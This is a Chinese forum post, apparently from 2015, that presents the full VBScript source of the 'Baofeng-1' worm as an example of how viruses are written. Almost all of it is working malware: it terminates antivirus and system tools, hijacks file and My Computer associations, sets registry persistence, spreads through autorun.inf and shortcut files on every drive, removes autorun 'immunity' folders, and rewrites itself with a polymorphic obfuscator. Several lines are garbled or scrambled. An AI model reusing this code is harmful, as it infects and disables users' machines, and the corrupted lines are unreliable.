病毒编写方式，以暴风一号 VBS 病毒源代码为例

请不要在回答技术问题时复制粘贴 AI 生成的内容

This topic created in 3816 days ago, the information mentioned may be changed or developed.

暴风一号病毒源代码，一些杀毒软件又称“ 1K 快捷方式病毒”，是一个大学生的闲暇之作。值得研究学习， VBS 病毒的鼻祖是马尼拉 AMA 计算机大学的学生编写的“爱虫”病毒。很久了。
On Error Resume Next
Dim Fso,Wshshell
Set Fso = CreateObject("Scripting.Filesystemobject")
Set Wshshell = CreateObject("Wscript.Shell&qut;)

Call Main()

Sub Main()

On Error Resume Next Dim Args, VirusLoad, VirusAss Set Args = WScript.Arguments VirusLoad = GetMainVirus(1) VirusAss = GetMainVirus(0) ArgNum = 0 Do WhileArgNum < Args.Count Param = Param & " " & Args(ArgNum) ArgNum = ArgNum + 1 Loop SubParam = LCase(Right(Param, 3)) Select Case SubParam Case "run" RunPath = Left(WScript.ScriptFullName, 2) Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "txt", "log","ini" ,"inf" RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Param Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "bat", "cmd" RunPath = "CMD /c echo Hi!I'm here!&pause" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "reg" RunPath = "regedit.exe " & """" & Trim(Param) & """" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "chm" RunPath = "hh.exe " & """" & Trim(Param) & """" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "hlp" RunPath = "winhlp32.exe " & """" & Trim(Param) & """" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "dir" RunPath = """" & Left(Trim(Param),Len(Trim(Param)) - 3) & """" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "oie" RunPath = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE""" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "omc" RunPath = "explorer.exe / n, {20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "emc" RunPath = "explorer.exe / n, / e, {20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case Else If PreDblInstance = True Then WScript.Quit End If Call MonitorSystem() End Select

End Sub

Sub MonitorSystem()
On Error Resume Next
Dim ProcessNames, ExeFullNames

ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr","regedit.pif", "regedit.com", "msconfig.exe") VBSFullNames = Array(GetMainVirus(1)) Do Call KillProcess(ProcessNames) Call InvadeSystem(GetMainVirus(1),GetMainVirus(0)) Call KeepProcess(VBSFullNames) WScript.Sleep 3000 Loop

End Sub

Sub InvadeSystem(VirusLoadPath,VirusAssPath)
On Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value = "%SystemRoot%\system\svchost.exe " & """" & VirusLoadPath & """"
File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode = GetCode(WScript.ScriptFullName)
Version = 1
HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
For Each Drive In Fso.Drives
If Drive.IsReady And (Drive.DriveType = 1 Or Drive.DriveType = 2 Or Drive.DriveType = 3) Then
DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
If FSO.FileExists(VirusAssPath) = False Or FSO.FileExists(VirusLoadPath) = False Or FSO.FileExists(HostFilePath) = False Or GetVersion() < Version Then
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
If ReadReg(HCULoad) <> Load_Value Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < Version Then
Call WriteReg (HCUVer, Version, "")
End If
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\") <> File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\") <> File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\") <> File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\") <> File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\") <> File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\") <> File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\") <> File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\") <> File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\") <> MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\") <> MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
Call RegSet()
End Sub

Sub CopyFile(source, pathf)

On Error Resume Next If FSO.FileExists(pathf) Then FSO.DeleteFile pathf , True End If FSO.CopyFile source, pathf

End Sub

Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText = FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText = FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub

Sub RegSet()
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4

RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue" RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue" RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun" RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut" Call WriteReg (RegPath1, 3, "REG_DWORD") Call WriteReg (RegPath2, 2, "REG_DWORD") Call WriteReg (RegPath3, 0, "REG_DWORD") Call DeleteReg (RegPath4)

End Sub

Sub KillProcess(ProcessNames)
On Error Resume Next
Set WMIService = GetObject("winmgmts
[url = file
/ / \ \ . \ root \ cimv2] \ \ . \ root \ cimv2[ / url]")
For Each ProcessName In ProcessNames
Set ProcessList = WMIService.execquery(" Select * From win32_process where name ='" & ProcessName & "' ")
For Each Process In ProcessList
IntReturn = Process.terminate
If intReturn <> 0 Then
WshShell.Run "CMD /c ntsd -c q -p " & Process.Handle, vbHide, False
End If
Next
Next
End Sub

Sub KillImmunity(D)
On Error Resume Next
ImmunityFolder = D & "
\ Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " / t / e / c / g everyone
f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True
End If
End Sub

Supplement 1 Dec 12, 2015

http://photo.weibo.com/3763648185/photos/large/photo_id/3919223398249835/album_id/3642752536576210

7 replies 2015-12-09 16:33:25 +08:00

2015813

Dec 8, 2015

Sub KeepProcess(VBSFullNames)
On Error Resume Next
For Each VBSFullName In VBSFullNames
If VBSProcessCount(VBSFullName) < 2 Then
Run("%SystemRoot%\system\svchost.exe " & VBSFullName)
End If
Next
End Sub

Function GetSystemDrive()
GetSystemDrive = Left(Fso.GetSpecialFolder(0),2)
End Function

Function GetFileSystemType(Drive)
Set d = FSO.GetDrive(Drive)
GetFileSystemType = d.FileSystem
End Function

Function ReadReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
ReadReg = tmps.RegRead(strkey)
Set tmps = Nothing
End Function

Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
If vtype = "" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps = Nothing
End Sub

Sub DeleteReg(strkey)
Dim tmps
Set tmps = CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps = Nothing
End Sub

Sub SetHiddenAttr(path)
On Error Resume Next
Dim vf
Set vf = FSO.GetFile(path)
Set vf = FSO.GetFolder(path)
vf.Attributes = 6
End Sub

Sub Run(ExeFullName)
On Error Resume Next
Dim WshShell
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ExeFullName
Set WshShell = Nothing
End Sub

Sub InfectRoot(D,VirusName)
On Error Resume Next
Dim VBSCode
VBSCode = GetCode(WScript.ScriptFullName)
VBSPath = D & "\" & VirusName
If FSO.FileExists(VBSPath) = False Then
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(VBSPath)
End If
Set Folder = Fso.GetFolder(D & "\")
Set SubFolders = Folder.Subfolders
For Each SubFolder In SubFolders
SetHiddenAttr(SubFolder.Path)

LnkPath = D & "\" & TargetPath = D & "\" & VirusName
Args = """" & D & "\" & SubFolder.Name & "\Dir"""
If Fso.FileExists(LnkPath) = False Or GetTargetPath(LnkPath) <> TargetPath Then
If Fso.FileExists(LnkPath) = True Then
FSO.DeleteFile LnkPath, True
End If

Call CreateShortcut(LnkPath,TargetPath,Args)
End If
Next
End Sub

Sub CreateShortcut(LnkPath,TargetPath,Args)
Set Shortcut = WshShell.CreateShortcut(LnkPath)
With Shortcut
.TargetPath = TargetPath
.Arguments = Args
.WindowStyle = 4
.IcOnLocation= "%SystemRoot%\System32\Shell32.dll, 3"
.Save
End With
End Sub

Sub CreateAutoRun(D,VirusName)
On Error Resume Next
Dim InfPath, VBSPath, VBSCode
InfPath = D & "
\ AutoRun.inf"
VBSPath = D & "
\ " & VirusName
VBSCode = GetCode(WScript.ScriptFullName)
If FSO.FileExists(InfPath) = False Or FSO.FileExists(VBSPath) = False Then
Call CreateFile(VBSCode, VBSPath)
Call SetHiddenAttr(VBSPath)
StrInf = "[AutoRun]" & vbCrLf & "Shellexecute=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open=打开(&O)" & vbCrLf & "shell\open\command=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open\Default=1" & vbCrLf & "shell\explore=资源管理器(&X)" & vbCrLf & "shell\explore\command=WScript.exe " & VirusName & " ""AutoRun"""
Call KillImmunity(D)
Call CreateFile(StrInf, InfPath)
Call SetHiddenAttr(InfPath)
End If
End Sub

Sub SetTxtFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetIniFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetInfFileAss(sFilePath)
On Error Resume Next
Dim Value
alue = "%StemRootVystem3yscript%\Sript.\WS " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetBatFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetCmdFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

2015813

Dec 8, 2015

Sub SethlpFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetRegFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetchmFileAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetIEAss(sFilePath)
On Error Resume Next
Dim Value
Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OIE "
itl WCalEg("eRerOCAY_LHKNEACHL_MEFTW\SOIRE\\ClARes\Applications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ")
End Sub

Sub SetMyComputerAss(sFilePath)
On Error Resume Next
Dim Value1,Value2
Value1 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OMC "
Value2 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " EMC "
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\", "", "REG_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ")
Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\", Value2, "REG_EXPAND_SZ")
End Sub

Function GetSerialNumber(Drv)
On Error Resume Next
det.Ssoo.GetDrive(Drv)
GetSerialNumber = d.SerialNumber
GetSerialNumber = Replace(GetSerialNumber,"-","")
End Function

Function GetMainVirus(N)
On Error Resume Next
MainVirusName = GetSerialNumber(GetSystemDrive()) & ".vbs"
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
If N = 1 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\smss.exe" & MainVirusName
End If
If N = 0 Then
GetMainVirus = Fso.GetSpecialFolder(N) & "\explorer.exe" & MainVirusName
End If
Else
GetMainVirus = Fso.GetSpecialFolder(N) & "\" & MainVirusName
End If
End Function

Function VBSProcessCount(VBSPath)
On Error Resume Next
Dim WMIService, ProcessList, Process
VBSProcessCount = 0
Set WMIService = GetObject("winmgmts
[url = file
/ / \ \ . \ root \ cimv2] \ \ . \ root \ cimv2[ / url]")
Set ProcessList = WMIService.ExecQuery("Select * from Win32_Process Where " & "Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'")
For Each Process In ProcessList
If InStr(Process.CommandLine, VBSPath) > 0 Then
VBSProcessCount = VBSProcessCount + 1
End If
Next
End Function

Function PreDblInstance()
On Error Resume Next
PreDblInstance = False
If VBSProcessCount(WScript.ScriptFullName) >= 3 Then
PreDblInstance = True
End If
End Function

Function GetTargetPath(LnkPath)
On Error Resume Next
Dim Shortcut
Set Shortcut = WshShell.CreateShortcut(LnkPath)
GetTargetPath = Shortcut.TargetPath
End Function

Function GetCode(FullPath)
On Error Resume Next
Dim FileText
Set FileText = FSO.OpenTextFile(FullPath, 1)
GetCode = FileText.ReadAll
FileText.Close
End Function

Function GetVersion()
Dim VerInfo
VerInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
If ReadReg(VerInfo) = "" Then
GetVersion = 0
Else
GetVersion = CInt(ReadReg(VerInfo))
End If
End Function

Function GetInfectedDate()
On Error Resume Next
Dim DateInfo
DateInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
If ReadReg(DateInfo) = "" Then
GetInfectedDate = ""
Else
GetInfectedDate = CDate(ReadReg(DateInfo))
End If
End Function

Execute("set e452 = createobject(""scripting.filesystemobject"")
Set d600 = e452.opentextfile(WScript.scriptfullname,1)
Do untild600.atendofstream
F19a = Trim(d600.readline)
If Left(f19a,1) = ""'"" then
F631 = e30b(Mid(f19a,2,Len(f19a) - 2),Right(f19a,1))
Randomize
A880 = Int(8 * Rnd + 2)
Dcc1 = ""'""&e30b(f631,a880)&a880
Else
Dcc1 = f19a
Dcc1 = a972(dcc1)
Dcc1 = b26b(dcc1)
End If
Fbbe = fbbe & f631 & vbCrLf
A41a = a41a & dcc1 & vbCrLf
F631 = """"
Dcc1 = """"
Loop
Set d600 = e452.opentextfile(WScript.scriptfullname,2)
D600.write a41a
D600.close
Set e452 = Nothing
Execute fbbe

Function e30b(ba1e,a880)
For d769 = 1 To Len(ba1e) step a880
E30b = e30b + StrReverse(Mid(ba1e,d769,a880))
Next
End Function

Function b26b(ba1e)
Randomize
For d769 = 1 To Len(ba1e)
D841 = Mid(UCase(ba1e),d769,1)
If Int(Rnd * 2) Then
D841 = LCase(d841)
End If
B26b = b26b & d841
Next
End Function

Function a972(ba1e)
Randomize
For d769 = 0 To 13
Ba1e = Replace(UCase(ba1e),UCase(Hex( & he452 + d769)),UCase(Hex(Int(Rnd * 24000 + 40960) + d769)))
Next
A972 = ba1e
End Function